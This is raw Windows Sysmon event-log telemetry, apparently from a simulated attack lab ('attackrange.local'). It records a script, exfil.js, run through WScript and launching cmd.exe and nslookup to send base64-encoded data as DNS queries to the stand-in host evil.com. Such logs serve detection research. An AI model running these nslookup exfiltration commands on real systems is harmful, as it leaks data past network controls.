14:21:48.234{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.234{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-EE45-000000005F02}5912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.234{2E1864BB-18E0-629A-6742-000000005F02}39767948C:\Windows\System32\WScript.exe{2E1864BB-18FC-629A-EE45-000000005F02}5912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.244{2E1864BB-18FC-629A-EE45-000000005F02}5912C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvhrj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.234{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbrir.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.203{2E1864BB-18FC-629A-EC45-000000005F02}60325272C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-ED45-000000005F02}388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.203{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-ED45-000000005F02}388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.203{2E1864BB-18FC-629A-EB45-000000005F02}53641096C:\Windows\system32\cmd.exe{2E1864BB-18FC-629A-ED45-000000005F02}388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.213{2E1864BB-18FC-629A-ED45-000000005F02}388C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FC-629A-EB45-000000005F02}5364C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbrir.tmp 2>&1 10341000x8000000000000000214521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.181{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-EC45-000000005F02}6032C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.181{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-EC45-000000005F02}6032C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.181{2E1864BB-18FC-629A-EC45-000000005F02}60325272C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-EB45-000000005F02}5364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.166{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-EC45-000000005F02}6032C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.166{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.166{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.166{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.166{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.166{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-EB45-000000005F02}5364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.166{2E1864BB-18E0-629A-6742-000000005F02}39761908C:\Windows\System32\WScript.exe{2E1864BB-18FC-629A-EB45-000000005F02}5364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.166{2E1864BB-18FC-629A-EB45-000000005F02}5364C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbrir.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.150{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsavun.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.134{2E1864BB-18FC-629A-E945-000000005F02}35524848C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-EA45-000000005F02}6680C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.134{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.134{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.134{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.134{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.134{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-EA45-000000005F02}6680C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 